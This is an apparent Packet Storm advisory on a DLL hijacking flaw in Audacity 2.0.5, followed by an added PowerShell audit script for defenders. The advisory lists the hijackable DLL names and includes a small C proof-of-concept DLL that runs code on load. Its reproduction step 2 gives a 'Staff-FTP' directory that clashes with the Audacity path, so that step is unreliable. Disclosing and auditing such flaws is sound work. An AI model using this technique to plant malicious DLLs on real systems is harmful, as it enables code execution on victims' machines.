Audacity 2.0.5 DLL Hijack

28 May 2015 | Reported by Mystyle Rahul | Type: packetstorm | Source: packetstormsecurity.com

A local DLL injection vulnerability has been discovered in Audacity 2.0.5, allowing attackers to execute custom code with system access by placing malicious files in the program directory.

Code
`A local dll injection vulnerability has been discovered in the official Audacity 2.0.5.  
Because the program does not specify a fully qualified path name, it uses a fixed search path to look for specific files or libraries. This path includes directories that may not be trusted or that may be under user control. By placing a custom version of the file or library in the path, an attacker causes the program to load it before the legitimate version. This allows a local attacker to inject custom code that will run with the privileges of the program or of the user executing the program. In some cases the attack can be leveraged remotely by placing the malicious file or library on a network share or in an extracted archive downloaded from a remote source. In some cases this can be done by tricking a user into running a hostile script from the local file system or a USB drive.  
  
When a malicious dll is created with the following names:  
avformat-52.dll  
avutil-50.dll  
avcodec-52.dll  
and placed in the Audacity installation directory, C:\Program Files (x86)\Audacity, the code within the malicious DLL is executed when a legitimate user starts Audacity: the process starts and then closes right away. This can lead to total compromise of the system on which it is installed.  
  
Vulnerability Information:  
Class: DLL Hijacking  
Impact: System access  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
  
Vulnerable Software:  
[+] Audacity  
  
Vulnerable Version(s):  
[+] v2.0.5  
  
Vulnerable Libraries:  
[+]avformat-52.dll  
[+]avutil-50.dll  
[+]avcodec-52.dll  
  
Proof of Concept (PoC):  
=======================  
Manual steps to reproduce the local vulnerability ...  
1. Compile dll and rename to avformat-52.dll , avutil-50.dll , avcodec-52.dll  
2. Copy avformat-52.dll to C:\Program Files\Staff-FTP  
3. Launch Audacity  
  
PoC: Exploit   
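#include <windows.h>  
#include <stdlib.h> /* exit() */  
  
/* PoC payload: launches calc, then terminates the host process. */  
int alpdaemon()  
{  
    WinExec("calc", SW_SHOW);  
    exit(0);  
    return 0;  
}  
  
/* Called by the loader when the DLL is mapped into the process. */  
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
    alpdaemon();  
    return 0;  
}  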
`
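
A defender-side check for the condition the advisory describes, as an added example that is not part of the original advisory: it reports any of the three named DLLs found in the Audacity install directory, with signature status and hash, and then lists the principals that can create files there. The default path is the one given in the advisory; the excluded account names assume an English-locale Windows installation.

```powershell
# Added example: audit an Audacity install directory for the DLL names listed
# in the advisory and for principals that could plant a file there.
param(
    # Path as given in the advisory; adjust for the host being checked.
    [string]$InstallDir = 'C:\Program Files (x86)\Audacity'
)

$names = 'avformat-52.dll', 'avutil-50.dll', 'avcodec-52.dll'

# 1. Report each named DLL that sits next to the executable.
foreach ($name in $names) {
    $path = Join-Path $InstallDir $name
    if (Test-Path -LiteralPath $path -PathType Leaf) {
        $sig = Get-AuthenticodeSignature -LiteralPath $path
        [pscustomobject]@{
            File      = $path
            Signature = $sig.Status                      # e.g. NotSigned, Valid
            Signer    = $sig.SignerCertificate.Subject   # empty when unsigned
            SHA256    = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            Created   = (Get-Item -LiteralPath $path).CreationTimeUtc
            Owner     = (Get-Acl -LiteralPath $path).Owner
        }
    }
}

# 2. List principals, other than the expected administrative ones, that hold
#    rights allowing files to be created or permissions changed in the directory.
#    GENERIC_ALL (0x10000000) and GENERIC_WRITE (0x40000000) are included because
#    inherited ACEs can carry raw generic rights.
$mask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData, ChangePermissions, TakeOwnership' -bor 0x10000000 -bor 0x40000000

# Assumption: English-locale account names.
$expected = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
            'NT SERVICE\TrustedInstaller', 'CREATOR OWNER'

(Get-Acl -LiteralPath $InstallDir).Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ([int]$_.FileSystemRights -band $mask) -and
        $expected -notcontains $_.IdentityReference.Value
    } |
    Select-Object IdentityReference, FileSystemRights, IsInherited
```

Any row from the second step means a non-administrative principal can write into the directory; a file reported by the first step should be compared against a known-good copy before it is trusted.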
